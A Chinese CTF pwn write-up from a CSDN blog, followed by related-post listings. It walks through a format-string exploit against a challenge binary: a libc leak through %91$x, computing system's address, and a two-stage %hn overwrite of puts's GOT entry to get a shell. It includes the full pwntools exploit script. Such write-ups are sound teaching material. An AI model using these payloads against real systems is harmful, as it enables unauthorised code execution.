CTF-PWN-printf(实验吧|格式化字符漏洞)

最新推荐文章于 2024-05-03 22:09:26 发布
最新推荐文章于 2024-05-03 22:09:26 发布
阅读量3.2k 收藏 3
点赞数
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/getsum/article/details/86739498
版权

首先运行文件,发现需要输入name,于是打开ida逆向出正确的name,来到了程序主界面。

首先我们先逐一判断函数的用途。put_file是让我们输入文本名称和内容,get_file是让我们输入文本名称,然后程序输出文本内容。show_dir是按照先来后出输出所有的文本名称,并且无缝衔接。

这个时候我们发现get_file函数中显然有一个格式化字符漏洞。

这种漏洞会导致我们可以控制任意内存的读写,因此我们考虑由此下手,构造system(/bin/sh)拿到shell

由于show_dir为反向输出,并且中间没有分隔符号,所以我们对输入的文件名下手,构造/bin/sh,那么自然,我们就可以劫持puts函数为system函数

然而程序本身没有system函数的入口,所以我们要找到一种办法将GOT中system函数的地址覆盖到puts函数中

在Linux终端,通过输入:

readelf -r pwn

我们可以查看到puts在运行的时候实际地址被存放到的地址

所以我们下一步就是找到system的实际地址,然后利用格式化字符漏洞,将其写入0x804a028中 

 这里参考了一下leehaming的博客https://blog.csdn.net/lee_ham/article/details/82556622,利用以下公式,可以算出system在运行时的实际地址

libc_base = __libc_start_main_addr - __libc_start_main_offset

system_addr = libc_base + system_offset

用gdb-peda在printf函数处下断点,检查栈。(命令为 stack 100)

 

我们发现了__libc_start_main+247为0xffffd03c,又因为栈顶位置与0xffffd03c距离为364,364/4=91,所以我们可以直接输入%91$x来表示,于是__libc_start_main就可以求出来了

通过libc-database可以知道system函数相关的偏移值,然后system函数的地址我们也可以求出

接下来就是将地址写入puts的临时地址位置中。

为了加快速度,我们可以考虑将system的地址(假设为0xaabbccdd)分成两部分,低地址放进 0x804a028,高地址放进0x804a02a。

构造payload

payload1 = p32(puts_got_addr) + '%%%dc' % ((system_addr & 0xffff)-4) + '%7$hn'
payload2 = p32(puts_got_addr+2) + '%%%dc' % ((system_addr>>16 & 0xffff)-4) + '%7$hn'
之所以是%7$hn,是因为我们在程序停止于printf函数时,打印栈发现我们需要改变的地方的偏移量为7。

exp程序:

from pwn import *
context.log_level = 'debug'

#prog = remote('106.2.25.7',8001)
prog=process("./pwn")

def putfile( prog , filename , content ) :
   print 'putting ' , content 
   prog.sendline('put')
   prog.recvuntil(':')
   prog.sendline(filename)
   prog.recvuntil(':')
   prog.sendline(content)
   prog.recvuntil('ftp>')
def getfile(prog , filename ) :
   prog.sendline('get')
   prog.recvuntil(':')
   prog.sendline(filename)
   return prog.recv(2048)

prog.recv(2048)
prog.sendline('rxraclhm')
prog.recv(2048)
putfile(prog,'sh;','%91$x')
res = getfile( prog , 'sh;')
print res
mainadd = int(res[:8], 16)-247
sysadd = mainadd - 0x18540 + 0x3ada0 
print 'system addr ' , hex(sysadd)
putsadd = 0x0804a028

payload1 = p32(putsadd) + '%%%dc' % ((sysadd & 0xffff)-4) + '%7$hn'
putfile(prog , 'in/' , payload1)
getfile(prog , 'in/')
prog.recvuntil('ftp>')

payload2 = p32(putsadd+2) + '%%%dc' % ((sysadd>>16 & 0xffff)-4) + '%7$hn'
putfile(prog, '/b' , payload2)
getfile(prog,'/b')
prog.recvuntil('ftp>')
prog.sendline('dir')
prog.interactive()

 

SuperGate
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugkuCTF-PWN题pwn6-printf超详细讲解(未提供Libc版本)
am_03的博客
08-31 1042
查看文件类型: 查看保护机制: IDA64位打开: 伪码: 查看子程序: case 2: case 3: case 1:
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
【Pwn】printf漏洞
weixin_52553215的博客
03-10 1085
参考:https://bbs.pediy.com/thread-250858.htm Format String 介绍 1 printf("Team Name: %s\tPoints: %d\n", "Whitzard", 999); 在上面这行语句中, "Team Name: %s\tPoints: %d\n"为格式化字符串(即printf第一个参数),"Whitzard"、999分别为第二个和第三个参数。在格式化字符串解析时,格式化字符串中的 "%s" 对应
[XYCTF新生赛]-PWN:fmt解析(scanf格式化字符漏洞,任意地址写)
最新发布
2301_79326813的博客
05-03 195
查看保护查看ida这里没什么好说的。
pwn入门笔记(3)——printf漏洞调试
weixin_45551695的博客
07-28 534
printf 在C语言中,我们经常使用各种函数来进行输出操作 printf,fprintf,vprintf,vfprintf,sprint等, 其中Fomat String是其第一个参数,我们一般称之为格式化字符串 printf 接受变长的参数,其中第一个参数为格式化字符串,后面的参数在实际运行时将与格式化字符串中特定格式的子字符串进行对应,将格式化字符串中的特定子串,解析为相应的参数值。 解析 我们都知道printf在执行的时候,首先进行格式化字符串的解析,,从栈或者寄存器中获取参数并与符号说明相匹配,然
[PWN][基础篇]printf漏洞介绍
网络安全知识分享
03-20 5078
printf漏洞介绍1、概念2、漏洞成因 1、概念 printf接受变长的参数,其中第一个参数为格式化字符串,后面的参数在实际运行时将与格式化字符串中特定的子字符串进行对应,将格式化字符串中的特定字串,解析为相应的参与值。格式化字符串就是%这种。 2、漏洞成因 printf函数在执行时,首先进行格式化字符串的解析–从栈(或者寄存器)获取参数并与符号说明进行匹配,然后将匹配的结果输出到屏幕上,那么 ,如果格式化字符串中的符号声明与栈上参数不能正确匹配,比如参数个数少于符号声明个数时,就会造成泄漏。 而本书,p
pwn学习资料整理——x64中的printf回显漏洞
recover517的博客
08-04 365
利用printf打印栈中内容 B站上有讲解有关printf回显栈数据的课程,但都是以x86为例,这次做题遇到x64架构下的相关漏洞,故做本次记录。 IDA伪代码 int __cdecl main(int argc, const char **argv, const char **envp) { char v4[32]; // [rsp+0h] [rbp-30h] BYREF char buf[16]; // [rsp+20h] [rbp-10h] BYREF setvbuf(stdin, 0L
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
0ctf-2017-pwn-char
02-05
2017年0ctf的pwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctf的pwn题char的libc库文件
利用printf调用malloc getshell&&0ctf2017_easiestprintf
azraelxuemo的博客
04-03 1052
文章目录0ctf2017_easiestprintf题目分析保护源码do_readleave攻击泄露libc如何劫持控制流printf源码分析小结开始利用__free_hook替换成gadget__malloc_hook换成one_gagdet最后一种解法 首先题目名字严重…漏洞看上去很简单,但真的好难 0ctf2017_easiestprintf 0ctf2017_easiestprintf 题目分析 最难的题目往往代码很简单 保护 RELRO 全开,也就是不能修改fini,init,got表来劫持控制流
hctf[pwn]babyprintf_ver2
九层台
11-15 796
0x01程序分析 程序给出了data段的地址,然后允许向这个地址处输入0x1ff个字节。 这个data段到底存的是什么呢? pwndbg> print $rbx + $rax $1 = 0x555555756011 pwndbg> x /50xg 0x555555756011 0x555555756011: 0x7200676664647364 0x200000000000646c ...
[pwn]关于printf输出时机的坑
Breeze的博客
08-26 8307
关于printf输出时机的坑 今天遇到了一个特别有意思的题,本来很简单的利用,但一直没有算出来,最后发现是一个很简单的却很细节的问题。 welpwn详细writeup 题目地址:welpwn 首先查看一下安全策略: 保护很少,然后看一下代码逻辑: read读入了0x400个字节,一般这么长必有溢出,注意echo并不是系统函数,查看echo逻辑: s2只有16个字节,但却复制了一个0x400字...
[PWN][基础篇]如何利用printf漏洞突破canary保护
网络安全知识分享
03-21 4005
如何利用printf漏洞突破canary保护 使用的实例代码如下 为了配合本次实例的教学,大家在编译时,不加pie保护,加cannary保护,整个的流程就是,分析程序之后,编写exp,利用printf漏洞(填充func函数,使其返回地址为exploit函数)来突破canary并且覆盖ret。 之后使用gdb开文件,查看func函数 来自英语白痴的小tip: 我们可以大概搞清楚func的流程,就是先read,然后printf,然后read,就是这样子。 我们下断就下到printf这里,我输入的测试用例是
buuctf 强制转换无符号数溢出 任意地址读、跳转 _printf_chk free_hook jmpesp scanf输入过长触发malloc
carol2358的博客
08-06 1175
文章目录zctf2016_note2 zctf2016_note2 本题的漏洞在这里 有符号数和无符号数进行了比较,转换为无符号数, 我们把size设为0,那-1就永远大于i,就可以溢出了 本题可以改got表,heap_ptr的地址也可以找到,那就unlink 改成这样就行,利用chunk1的溢出 然后改atoi为system, 输入sh就行了 exp: from pwn import * from LibcSearcher import * local_file = './note2' loca
CTF中简单杂项小结
Amire0x的小乐园
03-09 7422
MISC1 参考 CTF Wiki MISC 简介 主要分为几个板块:Recon,Forensic,Stego,Crypto(古典密码)… Recon:信息收集 主要介绍一些获取信息的渠道和一些利用百度、谷歌等搜索引擎的技巧 Encode(编码转换) 主要介绍在 CTF 比赛中一些常见的编码形式以及转换的技巧和常见方式 Forensic && Stego(数字取证 && 隐写分析) 隐写取证是 Misc 中最为重要的一块,包括文件分析、隐写、
CTF训练(PWN)——format_secret
weixin_49270591的博客
04-12 431
CTF训练(PWN)——format_secret 这次拿到的是一道pwn题,作为新手只能慢慢学习(啊啊啊啊,pwn是真的难~~) 读题 根据描述,知道是格式化字符漏洞,于是去度娘了解一下格式化字符漏洞是什么??? 这里附上来自同站大佬的链接:https://blog.csdn.net/qq_43394612/article/details/84900668 分析题目 首先下载附件 拿到一个意义不明的白色文件 解题 首先使用checksec进行查看 没有的话可以使用git进行安装 git clone
初步学习CTF格式化字符漏洞(待更新)
哔...的博客
03-25 942
初步学习CTF格式化字符漏洞(待更新) 文章目录初步学习CTF格式化字符漏洞(待更新)格式化字符漏洞原理利用格式化字符串进行任意地址读利用格式化字符串进行任意地址写 https://veritas501.space/2017/04/28/格式化字符漏洞学习/ 先 List item 看看例子 int main() { char s[60]; char v6 FILE* s...
ctfd-pwn赛题收集
10-23
ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题可以包含多种类型的漏洞,例如缓冲区溢出、格式化字符漏洞、整数溢出等。在收集赛题时需要确保涵盖各种漏洞类型,增加题目的多样性和挑战性。 2. 难度级别:赛题的难度级别应该根据参赛者的水平来确定。可以设置多个难度级别的赛题,包括初级、中级和高级,以便参赛者可以逐步提高自己的技能。 3. 原创性:收集ctfd-pwn赛题时应尽量保持赛题的原创性,避免过多的抄袭或重复的赛题。这有助于增加参赛者的学习价值,同时也能提高比赛的公平性。 4. 实用性:收集的赛题应该具有实际应用的意义,能够模拟真实的漏洞和攻击场景。这样可以帮助参赛者更好地理解和掌握系统安全的基本原理。 5. 文档和解答:为每个收集的赛题准备详细的文档和解答是很有必要的。这些文档包括赛题的描述、利用漏洞的步骤和参考资源等,可以帮助参赛者更好地理解赛题和解题思路。 6. 持续更新:CTF比赛的赛题应该定期进行更新和维护,以适应不断变化的网络安全环境。同时也要根据参赛者的反馈和需求,不断收集新的赛题,提供更好的比赛体验。 综上所述,ctfd-pwn赛题的收集需要考虑赛题类型、难度级别、原创性、实用性、文档和解答的准备,以及持续更新的需求。这样才能提供一个富有挑战性和教育性的CTF比赛平台。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值